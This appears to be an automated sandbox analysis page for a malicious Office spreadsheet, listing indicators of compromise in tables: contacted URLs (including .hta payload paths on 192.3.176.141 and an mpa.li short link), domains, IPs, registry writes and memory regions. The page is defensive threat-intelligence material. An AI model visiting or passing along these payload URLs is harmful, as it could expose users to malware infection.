|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFp
|
unknown
|
||
|
http://192.3.176.141/a.li
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta...al=qui
|
unknown
|
||
|
http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFe089
|
unknown
|
||
|
https://mpa.li/uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display=fearless&technology=instinctive&feed=abusive&character
|
5.159.62.244
|
||
|
http://192.3.176.141/P
|
unknown
|
||
|
https://mpa.li/uiklDr?&colloquia=wistful&stadium=tangy&earthquake=feigned&official=quizzical&display
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaEM
|
unknown
|
||
|
http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htahttp://192.3.176.141/36/
|
unknown
|
||
|
http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htau
|
unknown
|
||
|
https://mpa.li/b
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://mpa.li/(
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htaC:
|
unknown
|
||
|
http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.htacepC:
|
unknown
|
||
|
http://192.3.176.141/d
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://192.3.176.141/36/bv/seethebestthingstobegoodwithhislifebestthigns.hta;
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
http://go.cr
|
unknown
|
||
|
http://192.3.176.141/36/goodthin
|
unknown
|
There are 38 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
216.58.212.174
|
||
|
drive.usercontent.google.com
|
142.250.186.97
|
||
|
mpa.li
|
5.159.62.244
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.3.176.141
|
unknown
|
United States
|
|
|
|
94.156.177.220
|
unknown
|
Bulgaria
|
|
|
|
5.159.62.244
|
mpa.li
|
Germany
|
||
|
5.159.62.243
|
unknown
|
Germany
|
||
|
142.250.186.142
|
unknown
|
United States
|
||
|
216.58.212.174
|
drive.google.com
|
United States
|
||
|
142.250.186.97
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
*./
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\284E8
|
284E8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
"4/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3257B
|
3257B
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32655
|
32655
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32ECD
|
32ECD
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32655
|
32655
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 78 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
D0000
|
heap
|
page read and write
|
||
|
2DB0000
|
trusted library allocation
|
page read and write
|
||
|
4104000
|
heap
|
page read and write
|
||
|
3A8000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
21D8000
|
trusted library allocation
|
page read and write
|
||
|
5A8000
|
heap
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
4B20000
|
heap
|
page read and write
|
||
|
3F0E000
|
stack
|
page read and write
|
||
|
1A868000
|
stack
|
page read and write
|
||
|
3D0C000
|
heap
|
page read and write
|
||
|
344000
|
heap
|
page read and write
|
||
|
2E00000
|
trusted library allocation
|
page read and write
|
||
|
549000
|
heap
|
page read and write
|
||
|
4213000
|
heap
|
page read and write
|
||
|
1B506000
|
heap
|
page read and write
|
||
|
2632000
|
trusted library allocation
|
page read and write
|
||
|
41F6000
|
heap
|
page read and write
|
||
|
38DD000
|
heap
|
page read and write
|
||
|
547000
|
heap
|
page read and write
|
||
|
3BB5000
|
heap
|
page read and write
|
||
|
1F9F000
|
stack
|
page read and write
|
||
|
1D6000
|
heap
|
page read and write
|
||
|
1D50000
|
direct allocation
|
page read and write
|
||
|
3CB1000
|
heap
|
page read and write
|
||
|
3BAD000
|
heap
|
page read and write
|
||
|
388E000
|
stack
|
page read and write
|
||
|
113000
|
heap
|
page read and write
|
||
|
353000
|
heap
|
page read and write
|
||
|
1B9BB000
|
stack
|
page read and write
|
||
|
3D0C000
|
heap
|
page read and write
|
||
|
7FE898C2000
|
trusted library allocation
|
page read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
238B000
|
trusted library allocation
|
page read and write
|
||
|
3CFA000
|
heap
|
page read and write
|
||
|
4B1C000
|
heap
|
page read and write
|
||
|
270F000
|
stack
|
page read and write
|
||
|
189000
|
heap
|
page read and write
|
||
|
24EA000
|
heap
|
page read and write
|
||
|
4AC6000
|
heap
|
page read and write
|
||
|
7FE898CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
41F9000
|
heap
|
page read and write
|
||
|
348A000
|
trusted library allocation
|
page read and write
|
||
|
3250000
|
heap
|
page read and write
|
||
|
36F0000
|
trusted library allocation
|
page read and write
|
||
|
175000
|
heap
|
page read and write
|
||
|
201B000
|
trusted library allocation
|
page read and write
|
||
|
57F000
|
trusted library allocation
|
page read and write
|
||
|
1C85A000
|
heap
|
page read and write
|
||
|
41FC000
|
heap
|
page read and write
|
||
|
132000
|
stack
|
page read and write
|
||
|
2FC000
|
heap
|
page read and write
|
||
|
1CC6A000
|
stack
|
page read and write
|
||
|
26FF000
|
stack
|
page read and write
|
||
|
54B000
|
heap
|
page read and write
|
||
|
4536000
|
heap
|
page read and write
|
||
|
3BB7000
|
heap
|
page read and write
|
||
|
1E73000
|
direct allocation
|
page read and write
|
||
|
51A000
|
heap
|
page read and write
|
||
|
1A564000
|
heap
|
page execute and read and write
|
||
|
396000
|
heap
|
page read and write
|
||
|
37E000
|
heap
|
page read and write
|
||
|
5051000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
3CFC000
|
heap
|
page read and write
|
||
|
170000
|
heap
|
page read and write
|
||
|
33F9000
|
heap
|
page read and write
|
||
|
464F000
|
heap
|
page read and write
|
||
|
3CF3000
|
heap
|
page read and write
|
||
|
3A45000
|
trusted library allocation
|
page read and write
|
||
|
3A18000
|
trusted library allocation
|
page read and write
|
||
|
3B1F000
|
heap
|
page read and write
|
||
|
3CF7000
|
heap
|
page read and write
|
||
|
2C5000
|
stack
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
2DA7000
|
trusted library allocation
|
page read and write
|
||
|
2DA1000
|
trusted library allocation
|
page read and write
|
||
|
2DAF000
|
trusted library allocation
|
page read and write
|
||
|
3E26000
|
trusted library allocation
|
page read and write
|
||
|
2B54000
|
heap
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
352000
|
heap
|
page read and write
|
||
|
420000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
51F000
|
heap
|
page read and write
|
||
|
3CFC000
|
heap
|
page read and write
|
||
|
604000
|
heap
|
page read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
4A0000
|
heap
|
page read and write
|
||
|
2BD9000
|
heap
|
page read and write
|
||
|
2BDE000
|
heap
|
page read and write
|
||
|
1E73000
|
direct allocation
|
page read and write
|
||
|
1E33000
|
direct allocation
|
page read and write
|
||
|
4A9000
|
heap
|
page read and write
|
||
|
7FE899E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F000
|
heap
|
page read and write
|
||
|
5A01000
|
trusted library allocation
|
page read and write
|
||
|
27C8000
|
trusted library allocation
|
page read and write
|
||
|
38CF000
|
heap
|
page read and write
|
||
|
54B000
|
heap
|
page read and write
|
||
|
38E000
|
heap
|
page read and write
|
||
|
446D000
|
heap
|
page read and write
|
||
|
2AF6000
|
heap
|
page read and write
|
||
|
7FE89976000
|
trusted library allocation
|
page read and write
|
||
|
4913000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
16F000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1AA35000
|
stack
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
1BBFE000
|
stack
|
page read and write
|
||
|
1EF000
|
heap
|
page read and write
|
||
|
1E67000
|
direct allocation
|
page read and write
|
||
|
15A000
|
heap
|
page read and write
|
||
|
223000
|
heap
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
1C1E8000
|
heap
|
page read and write
|
||
|
4648000
|
heap
|
page read and write
|
||
|
1EA4000
|
heap
|
page read and write
|
||
|
37DF000
|
stack
|
page read and write
|
||
|
12121000
|
trusted library allocation
|
page read and write
|
||
|
221000
|
heap
|
page read and write
|
||
|
1E00000
|
direct allocation
|
page read and write
|
||
|
3D04000
|
heap
|
page read and write
|
||
|
2BA9000
|
heap
|
page read and write
|
||
|
2DA9000
|
trusted library allocation
|
page read and write
|
||
|
1D00000
|
direct allocation
|
page read and write
|
||
|
10F000
|
heap
|
page read and write
|
||
|
429000
|
heap
|
page read and write
|
||
|
47A000
|
heap
|
page read and write
|
||
|
2BCE000
|
heap
|
page read and write
|
||
|
450000
|
heap
|
page read and write
|
||
|
2E7000
|
heap
|
page read and write
|
||
|
505000
|
heap
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
1CB2C000
|
stack
|
page read and write
|
||
|
3A2D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
1A871000
|
heap
|
page read and write
|
||
|
2BC1000
|
heap
|
page read and write
|
||
|
2E90000
|
trusted library allocation
|
page read and write
|
||
|
4002000
|
heap
|
page read and write
|
||
|
3CBA000
|
heap
|
page read and write
|
||
|
196000
|
heap
|
page read and write
|
||
|
196000
|
heap
|
page read and write
|
||
|
188000
|
heap
|
page read and write
|
||
|
2DA5000
|
trusted library allocation
|
page read and write
|
||
|
1C7CB000
|
stack
|
page read and write
|
||
|
2DB4000
|
trusted library allocation
|
page read and write
|
||
|
4F3000
|
heap
|
page read and write
|
||
|
3489000
|
trusted library allocation
|
page read and write
|
||
|
4212000
|
heap
|
page read and write
|
||
|
17D000
|
heap
|
page read and write
|
||
|
3421000
|
heap
|
page read and write
|
||
|
1A560000
|
heap
|
page execute and read and write
|
||
|
4214000
|
heap
|
page read and write
|
||
|
13F000
|
heap
|
page read and write
|
||
|
8C01000
|
trusted library allocation
|
page read and write
|
||
|
4B20000
|
heap
|
page read and write
|
||
|
41CC000
|
heap
|
page read and write
|
||
|
414000
|
heap
|
page read and write
|
||
|
306000
|
heap
|
page read and write
|
||
|
41A0000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
1AACF000
|
stack
|
page read and write
|
||
|
7FE898D3000
|
trusted library allocation
|
page read and write
|
||
|
2BC1000
|
heap
|
page read and write
|
||
|
22F1000
|
trusted library allocation
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
21C0000
|
heap
|
page execute and read and write
|
||
|
233E000
|
heap
|
page read and write
|
||
|
2E03000
|
trusted library allocation
|
page read and write
|
||
|
39A000
|
heap
|
page read and write
|
||
|
48B1000
|
heap
|
page read and write
|
||
|
3CB3000
|
heap
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
1C4B0000
|
heap
|
page read and write
|
||
|
2AB000
|
heap
|
page read and write
|
||
|
25F0000
|
heap
|
page read and write
|
||
|
1B88E000
|
stack
|
page read and write
|
||
|
239000
|
heap
|
page read and write
|
||
|
41D9000
|
heap
|
page read and write
|
||
|
27B4000
|
trusted library allocation
|
page read and write
|
||
|
1DB0000
|
direct allocation
|
page read and write
|
||
|
1C1B0000
|
heap
|
page read and write
|
||
|
143000
|
heap
|
page read and write
|
||
|
3D04000
|
heap
|
page read and write
|
||
|
313000
|
heap
|
page read and write
|
||
|
7FE89AC8000
|
trusted library allocation
|
page read and write
|
||
|
3377000
|
heap
|
page read and write
|
||
|
1A891000
|
heap
|
page read and write
|
||
|
33F8000
|
heap
|
page read and write
|
||
|
21CF000
|
stack
|
page read and write
|
||
|
1CA4000
|
heap
|
page read and write
|
||
|
1A59E000
|
heap
|
page execute and read and write
|
||
|
1B420000
|
heap
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
3BB7000
|
heap
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
464F000
|
heap
|
page read and write
|
||
|
349000
|
heap
|
page read and write
|
||
|
398000
|
heap
|
page read and write
|
||
|
12190000
|
trusted library allocation
|
page read and write
|
||
|
2FDF000
|
trusted library allocation
|
page read and write
|
||
|
3319000
|
trusted library allocation
|
page read and write
|
||
|
516000
|
heap
|
page read and write
|
||
|
51E000
|
heap
|
page read and write
|
||
|
7FE89AC4000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A7C000
|
trusted library allocation
|
page read and write
|
||
|
720000
|
heap
|
page read and write
|
||
|
7FE899A6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CE6000
|
heap
|
page read and write
|
||
|
408E000
|
stack
|
page read and write
|
||
|
44C000
|
heap
|
page read and write
|
||
|
340D000
|
heap
|
page read and write
|
||
|
2BBD000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
1FA0000
|
heap
|
page read and write
|
||
|
2FE0000
|
trusted library allocation
|
page read and write
|
||
|
1AC58000
|
stack
|
page read and write
|
||
|
3C51000
|
trusted library allocation
|
page read and write
|
||
|
1C8D2000
|
heap
|
page read and write
|
||
|
2811000
|
trusted library allocation
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
4D6000
|
heap
|
page read and write
|
||
|
4DD000
|
heap
|
page read and write
|
||
|
18B000
|
heap
|
page read and write
|
||
|
2A8000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
1AB69000
|
stack
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
1EF000
|
heap
|
page read and write
|
||
|
322000
|
heap
|
page read and write
|
||
|
2F60000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
18B000
|
heap
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
2580000
|
heap
|
page read and write
|
||
|
604000
|
heap
|
page read and write
|
||
|
1DB0000
|
heap
|
page read and write
|
||
|
4B13000
|
heap
|
page read and write
|
||
|
41E000
|
heap
|
page read and write
|
||
|
4B11000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
22F7000
|
heap
|
page read and write
|
||
|
18B000
|
heap
|
page read and write
|
||
|
2C7000
|
heap
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
1AAF2000
|
heap
|
page read and write
|
||
|
415000
|
heap
|
page read and write
|
||
|
452000
|
heap
|
page read and write
|
||
|
2DDA000
|
trusted library allocation
|
page read and write
|
||
|
41D6000
|
heap
|
page read and write
|
||
|
2430000
|
heap
|
page read and write
|
||
|
1BF6000
|
heap
|
page read and write
|
||
|
3891000
|
heap
|
page read and write
|
||
|
3433000
|
heap
|
page read and write
|
||
|
4630000
|
heap
|
page read and write
|
||
|
3FE7000
|
heap
|
page read and write
|
||
|
1BB6000
|
heap
|
page read and write
|
||
|
2DD6000
|
trusted library allocation
|
page read and write
|
||
|
373000
|
heap
|
page read and write
|
||
|
7FE89A73000
|
trusted library allocation
|
page read and write
|
||
|
262B000
|
heap
|
page read and write
|
||
|
1A1000
|
heap
|
page read and write
|
||
|
3FA0000
|
heap
|
page read and write
|
||
|
54D000
|
heap
|
page read and write
|
||
|
2838000
|
trusted library allocation
|
page read and write
|
||
|
1C885000
|
heap
|
page read and write
|
||
|
2BCE000
|
heap
|
page read and write
|
||
|
27CC000
|
trusted library allocation
|
page read and write
|
||
|
24F2000
|
heap
|
page read and write
|
||
|
453000
|
heap
|
page read and write
|
||
|
1CB0000
|
heap
|
page read and write
|
||
|
4D1000
|
heap
|
page read and write
|
||
|
3429000
|
heap
|
page read and write
|
||
|
2100000
|
heap
|
page execute and read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
509000
|
heap
|
page read and write
|
||
|
1D4D000
|
stack
|
page read and write
|
||
|
54F000
|
heap
|
page read and write
|
||
|
17B000
|
heap
|
page read and write
|
||
|
39D000
|
direct allocation
|
page read and write
|
||
|
1B61B000
|
heap
|
page read and write
|
||
|
23F1000
|
trusted library allocation
|
page read and write
|
||
|
41C9000
|
heap
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
2E1B000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
|
7FE8997C000
|
trusted library allocation
|
page execute and read and write
|
||
|
41FB000
|
heap
|
page read and write
|
||
|
342A000
|
heap
|
page read and write
|
||
|
2013000
|
trusted library allocation
|
page read and write
|
||
|
3CB3000
|
heap
|
page read and write
|
||
|
7FE89A77000
|
trusted library allocation
|
page read and write
|
||
|
15F000
|
heap
|
page read and write
|
||
|
167000
|
heap
|
page read and write
|
||
|
3D0C000
|
heap
|
page read and write
|
||
|
2DDB000
|
trusted library allocation
|
page read and write
|
||
|
3A4E000
|
trusted library allocation
|
page read and write
|
||
|
4719000
|
heap
|
page read and write
|
||
|
4214000
|
heap
|
page read and write
|
||
|
384000
|
heap
|
page read and write
|
||
|
38D0000
|
heap
|
page read and write
|
||
|
3D0C000
|
heap
|
page read and write
|
||
|
3860000
|
trusted library allocation
|
page read and write
|
||
|
3D0C000
|
heap
|
page read and write
|
||
|
414000
|
heap
|
page read and write
|
||
|
33F8000
|
heap
|
page read and write
|
||
|
5C9000
|
heap
|
page read and write
|
||
|
3B1F000
|
heap
|
page read and write
|
||
|
3448000
|
heap
|
page read and write
|
||
|
1E27000
|
direct allocation
|
page read and write
|
||
|
17B000
|
heap
|
page read and write
|
||
|
2CB000
|
stack
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
1C5FE000
|
stack
|
page read and write
|
||
|
2BA7000
|
heap
|
page read and write
|
||
|
2DD3000
|
trusted library allocation
|
page read and write
|
||
|
22A0000
|
heap
|
page execute and read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DD0000
|
trusted library allocation
|
page read and write
|
||
|
17F000
|
heap
|
page read and write
|
||
|
313000
|
heap
|
page read and write
|
||
|
1AA3E000
|
stack
|
page read and write
|
||
|
2BE6000
|
heap
|
page read and write
|
||
|
7FE898CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
14A000
|
heap
|
page read and write
|
||
|
1B3FD000
|
stack
|
